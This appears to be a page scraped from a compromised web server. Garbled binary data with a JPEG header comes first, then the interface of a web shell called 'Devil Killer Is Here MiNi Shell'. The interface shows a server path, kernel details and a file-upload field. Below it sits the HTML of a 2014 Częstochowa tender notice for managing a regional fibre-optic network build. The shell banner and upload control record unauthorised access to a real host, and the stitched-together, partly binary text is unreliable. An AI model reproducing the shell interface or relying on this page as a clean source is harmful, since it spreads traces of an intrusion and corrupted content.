JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140804/259250-N-2014.html

<p class="kh_header"><b>Częstochowa: Pełnienie funkcji menadżera projektu dla inwestycji realizowanej w systemie: zaprojektuj i wybuduj obiekt pn.: Budowa infrastruktury informatycznej dla Subregionu Północnego E-region częstochowski</b><br>
<b>Numer ogłoszenia: 259250 - 2014; data zamieszczenia: 04.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Częstochowa , ul. Śląska 11/13, 42-217 Częstochowa, woj. śląskie, tel. 34 3707100, faks 34 3707170.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czestochowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji menadżera projektu dla inwestycji realizowanej w systemie: zaprojektuj i wybuduj obiekt pn.: Budowa infrastruktury informatycznej dla Subregionu Północnego E-region częstochowski.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji menadżera projektu dla inwestycji realizowanej w systemie: zaprojektuj i wybuduj obiekt pn.: Budowa infrastruktury informatycznej dla Subregionu Północnego E-region częstochowski.
1. Realizacja inwestycji, która ma zostać objęta nadzorem przez menadżera projektu polega na:
1) wykonaniu kompleksowej dokumentacji budowlano-wykonawczej wraz z uzyskaniem stosownych dokumentów i pozwoleń;
2) budowie szerokopasmowej sieci teleinformatycznej w technologii światłowodowej wzdłuż istniejących dróg publicznych na terenie 30 gmin o długości ok. 340 km oraz wykonaniu punktów styku z istniejącymi lub budowanymi sieciami lokalnymi;
3) budowie 33 aktywnych węzłów dystrybucyjnych na terenie 30 gmin wraz z ich podłączeniem;
4) budowie 125 pasywnych punktów dystrybucyjnych;
5) utworzeniu 33 publicznych punktów dostępu do Internetu na terenie 30 gmin;
6) adaptacji i wyposażeniu pomieszczeń Centrum Zarządzania Siecią;
7) wykonaniu robót budowlanych towarzyszących;
8) wykonaniu testów, prób, odbiorów częściowych i przekazaniu prac;
9) działaniach informacyjnych o projekcie;
10) wykonaniu kompletnej dokumentacji powykonawczej wraz z inwentaryzacją poszczególnych elementów systemu;
11) zapewnieniu serwisu gwarancyjnego wraz z okresową konserwacją systemu.
Sieć ta musi być przystosowana do transmisji danych od różnych użytkowników i z różnych źródeł. Mogą to być:
a) wymiana informacji (połączenie sieci lokalnych) pomiędzy jednostkami samorządowymi oraz placówkami użyteczności publicznej;
b) dostęp do zasobów sieci Internet; 
c) systemy komunikacji głosowej (telefonia IP); 
d) udostępnienie zasobów baz danych takich jak, np. RSIP, ZSIP; 
e)  aplikacje związane z edukacją, np. dostęp do zasobów bibliotek;
f) monitoring Miasta, Gminy (przesyłanie obrazów z kamer);
g) zapewnienie komunikacji dla Centrum Zarządzania Kryzysowego;
h)  zarządzanie transportem i ruchem drogowym, tj.: sterowanie sygnalizacją świetlną na skrzyżowaniach;
i) dostęp do usług telemedycznych.
2. Menadżer Projektu będzie odpowiedzialny za kompleksową obsługę techniczną, w tym za prowadzenie nadzoru inwestorskiego w rozumieniu przepisów ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (j.t. Dz. U. z 2010 r. Nr 243, poz. 1623 ze zm.) nad prowadzeniem prac na wszystkich etapach projektu oraz dokonywanie odbiorów, rozliczeń  i klasyfikacji środków trwałych. Zakres odpowiedzialności Menedżera Projektu obejmuje także nadzór nad realizacją postanowień umowy z Wykonawcą robót budowlanych. W zakresie prac wynikających z Prawa budowlanego, do obowiązków Menedżera Projektu należy wykonanie zadań:
- inspektora nadzoru inwestorskiego zgodnie z art. 25 i 26 Prawa budowlanego; 
- koordynatora czynności nadzoru inwestorskiego zgodnie z art. 27 Prawa budowlanego; 
- inwestora zgodnie z art. 18 Prawa budowlanego w zastępstwie Zamawiającego.
3. Menadżer Projektu w ramach przedmiotowego zamówienia będzie świadczył kompleksową obsługę realizacji zadania, która obejmuje m.in.:
a) bieżącą aktualizację dokumentacji Projektu pod potrzeby Instytucji Zarządzającej, Komisji Europejskiej i polskiego prawa;
b) udział w przygotowaniu dokumentacji przetargowej dla zamówienia na roboty projektowo- budowlane;
c) usługi doradczo-prawne we wszystkich fazach realizacji Projektu;
d) wsparcie techniczno-prawne związane z dzierżawą kanalizacji teletechnicznej (m.in. analiza warunków dzierżawy, ocena i analiza zastosowanych materiałów w planowanych do dzierżawy kanałach, przygotowanie umowy dzierżawy);
e) szczegółowe rozliczenie środków przeznaczonych na realizację Projektu wraz z klasyfikacją środków trwałych;
f) przygotowanie założeń i opracowanie systemu zarządzania włóknami i kanalizacją teletechniczną oraz wykonanie kompletnej dokumentacji przetargowej na wybór operatora do zarządzania i eksploatacji wybudowanej infrastruktury telekomunikacyjnej
g) przygotowanie uchwał, umów, innych niezbędnych dokumentów i wsparcie  przy powołaniu podmiotu zajmującego się zarządzaniem wybudowaną infrastrukturą  w imieniu Partnerów Projektu. 
Szczegółowy zakres obowiązków, które menadżer projektu będzie musiał wykonać zawiera  wzór umowy, który stanowi załącznik nr 1 do specyfikacji.
4. Termin wykonania zamówienia: 
a) rozpoczęcie: w dniu podpisania umowy;
b) zakończenie: po końcowym odbiorze wykonanego zadania i uzyskaniu stosownych  dokumentów umożliwiających użytkowanie inwestycji oraz po całkowitym rozliczeniu zadania z wykonawcą robót;
c) wykonywanie w imieniu zamawiającego przeglądów wybudowanej infrastruktury, przez okres 5 lat od odbioru końcowego, uprawnień z tytułu gwarancji i rękojmi udzielonych przez wykonawcę robót i dostawców.
Przewidywany termin zakończenia  usługi - do dnia 12.11.2015 r.
Przewidywany termin zakończenia wykonywania w imieniu zamawiającego uprawnień z tytułu gwarancji i rękojmi, udzielonych przez wykonawcę robót lub dostawców- do dnia 12.11.2020 r..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających do wysokości 50% szacunkowej wartości zamówienia, polegających na pełnienie funkcji menadżera projektu dla przedmiotowej inwestycji w przypadku m.in. przedłużenia długości sieci światłowodowej, zwiększeniu liczby węzłów dystrybucyjnych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.54.00.00-5, 71.52.00.00-9, 71.31.80.00-0, 71.63.00.00-3, 79.11.10.00-5, 79.13.10.00-1, 71.24.70.00-1, 71.24.40.00-0, 71.24.80.00-8, 71.70.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga złożenia wadium w wysokości: 7.000,00 zł (słownie: siedem tysięcy złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wiedzy i doświadczenia niezbędnego do wykonania przedmiotu zamówienia, tj. udokumentowanie zakończenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jednej usługi, która w swoim zakresie obejmowała nadzór nad robotami budowlanymi dla inwestycji o łącznej wartości nadzorowanych robót budowlanych, dostaw i usług co najmniej 5 mln zł brutto.
W/w elementy składowe powyższego warunku zostaną uznane za spełnione, jeżeli były zrealizowane w jednym kontrakcie, jak również w osobnych kontraktach. Zamawiający dopuszcza sumowanie maksymalnie dwóch kontraktów.
W przypadku usług, których wartość została wyrażona w umowie w innej walucie niż PLN należy dokonać przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP na dzień zakończenia usług (w przypadku usług rozliczanych wyłącznie w walutach innych niż PLN)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia, tj.:
a)  osobą, która będzie pełnić funkcję kierownika zespołu menadżera projektu. Osoba taka musi posiadać: min. 3-letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych oraz doświadczenie w nadzorowaniu, kierowaniu i zarządzaniu kontraktem/kontraktami o łącznej wartości nadzorowanych robót nie mniejszej niż 5 mln zł brutto (dla potwierdzenia spełnienia warunku udziału w postępowaniu zamawiający dopuszcza sumowanie maksymalnie dwóch kontraktów) oraz uprawnienia do pełnienia samodzielnych funkcji w budownictwie w specjalności telekomunikacyjnej bez ograniczeń lub uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń. Kierownik zespołu musi wykazać się znajomością języka polskiego w stopniu umożliwiającym swobodne porozumiewanie się w mowie i piśmie (dopuszcza się zmianę tego warunku na zatrudnienie przez menadżera projektu na własny koszt tłumacza języka polskiego, zapewniającego stałe i biegłe tłumaczenie w kontaktach zamawiającego z menadżerem projektu).  
b)  osobami, które będą pełnić funkcję inspektorów nadzoru posiadającymi uprawnienia budowlane do nadzorowania robót w następujących specjalnościach:
1) telekomunikacyjnej bez ograniczeń - min. 3 osoby - osoba musi wykazać się doświadczeniem zawodowym polegającym na pełnieniu funkcji inspektora nadzoru inwestorskiego lub kierownika budowy lub kierownika robót dla inwestycji polegającej na budowie sieci telekomunikacyjnej;
2) drogowej bez ograniczeń;
3) instalacyjnej w zakresie sieci, instalacji i urządzeń  elektrycznych  i elektroenergetycznych;
4) konstrukcyjno - budowlanej bez ograniczeń
c) osobą, która będzie pełnić funkcję specjalisty ds. nadzoru konfiguracji urządzeń aktywnych. Osoba taka musi posiadać min. 3-letnie doświadczenie zawodowe jako specjalista akceptacji rozwiązań projektowych i konfiguracji urządzeń aktywnych, w tym brała udział przy min. 1 zakończonej inwestycji budowy sieci szerokopasmowej, która swoim zakresem obejmowała dostawę, instalację i konfigurację operatorskich urządzeń aktywnych z obsługą MPLS, VPLS (lub równoważnych) o wartości (dla części aktywnej) min. 250 tys. zł na światłowodowych kablach ziemnych. 
d) osobą, która będzie pełnić funkcję specjalisty ds. rozliczeń, analiz i przepływów finansowych. Osoba taka musi posiadać: wykształcenie wyższe techniczne lub ekonomiczne, min. 3-letnie doświadczenie zawodowe w rozliczaniu robót budowlanych liniowych, w tym min. 1 inwestycji o wartości robót nie mniejszej niż 5 mln zł. 
e) osobą, która będzie pełnić funkcję specjalisty ds. prawnych. Osoba taka musi posiadać: wykształcenie wyższe, uprawnienia radcy prawnego lub adwokata lub wpis na listę prawników zagranicznych prowadzoną przez właściwą Okręgową Izbę Radców Prawnych lub Okręgową Radę Adwokacką zgodnie z ustawą z dnia 5 lipca 2002 r. o świadczeniu przez prawników zagranicznych pomocy prawnej w Rzeczpospolitej Polskiej (Dz. U. Nr 126, poz. 1069 ze zm.) oraz min. 2-letnie doświadczenie zawodowe w zakresie świadczenia pomocy prawnej.
f) osobą, która będzie pełnić funkcję specjalisty ds. projektowania. Osoba taka musi posiadać: wykształcenie wyższe oraz minimum 3 letnie doświadczenie jako projektant projektów telekomunikacyjnych. Osoba ta będzie odpowiedzialna za weryfikację i akceptację dokumentacji projektowej na etapie realizacji projektu

Zamawiający nie dopuszcza łączenia funkcji poszczególnych osób.

Uwaga: 
W/w osoby powinny posiadać uprawnienia budowlane zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (j.t. Dz. U. z 2010 r. Nr 243, poz. 1623 ze zm.) oraz rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (j.t. Dz. U. Nr 83, poz. 578 ze zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. 
Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (j.t. Dz. U. Nr 63, poz. 394 ze zm.)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku spółek cywilnych w ofercie należy złożyć zaświadczenie z urzędu skarbowego oraz z Zakładu Ubezpieczeń Społecznych zarówno na spółkę, jak i na każdego ze wspólników.
2. Wymagania dotyczące dokumentów, określonych w punktach 6.1. od 6.3.
specyfikacji.
2.1. Dokumenty o których mowa w punkcie 6.1.e), 6.2.a) i 6.3.a) specyfikacji winny być złożone w oryginale. Dokumenty o których mowa w punktach 6.1.b), 6.1.c), 6.1.d) i 6.2.b) specyfikacji winny być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez osobę (-y) uprawnioną (-e) do składania oświadczeń woli w imieniu wykonawcy.
Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski.
2.2.  Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, to:
1) zamiast dokumentów, o których mowa w punktach 6.1.b), 6.1.c), 6.1.d) specyfikacji, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
2) Dokumenty, o którym mowa w podpunkcie 1)a) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Dokument, o którym mowa w podpunkcie 1)b), powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
3) Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w podpunkcie 1), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Przepis podpunktu 2) stosuje się odpowiednio.
2.3.  W przypadku składania oferty wspólnej przez kilku przedsiębiorców (tzw. konsorcjum) lub przez spółkę cywilną, każdy ze wspólników konsorcjum lub spółki cywilnej musi złożyć dokumenty wymienione w punkcie 6.1. specyfikacji (lub w punkcie 6.4.2. specyfikacji - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej wraz z dokumentem wymienionym w punkcie 6.1.a) i 6.1.e) specyfikacji).
Pozostałe dokumenty będą traktowane jako wspólne. Wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników.
Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego. 
2.4. Zgodnie z art. 26 ust. 2b Prawa zamówień publicznych wykonawca może polegać na wiedzy i doświadczeniu oraz osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, tj. przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. W/w zobowiązanie musi być przedstawione w oryginale.
Zamawiający wymaga podania przez wykonawcę nazw (firm) podwykonawców, na których zasoby wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 tej ustawy.
2.5. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku, gdy wykonawca wykazując spełnianie warunków, o których mowa w punktach 5.2. oraz 5.3.specyfikacji polega na zasobach innych  podmiotów, kopie dokumentów potwierdzających spełnianie tych warunków, dotyczących odpowiednio wspólników konsorcjum lub innych podmiotów powinny być poświadczone za zgodność z oryginałem przez wspólników konsorcjum (każdy w odniesieniu do dokumentów go dotyczących) lub przez pełnomocnika konsorcjum, jeżeli będzie miał do tej czynności upoważnienie, a w odniesieniu do innych podmiotów przez upoważnionych przedstawicieli tych podmiotów (każdy w odniesieniu do dotyczących go dokumentów).
3. Inne dokumenty wymagane przez zamawiającego:
a) Wypełniony druk OFERTA, stanowiący załącznik nr 2 do specyfikacji, zawierający oświadczenie, że wykonawca spełnia wszystkie warunki określone w specyfikacji istotnych warunków zamówienia oraz w art. 22 ust. 1 ustawy Prawo zamówień publicznych, a także informację, czy wykonawca należy/nie należy do grupy kapitałowej. 
Upoważnienie osób podpisujących ofertę musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny wykonawcy, to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie. 
b) Dowód wpłaty wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
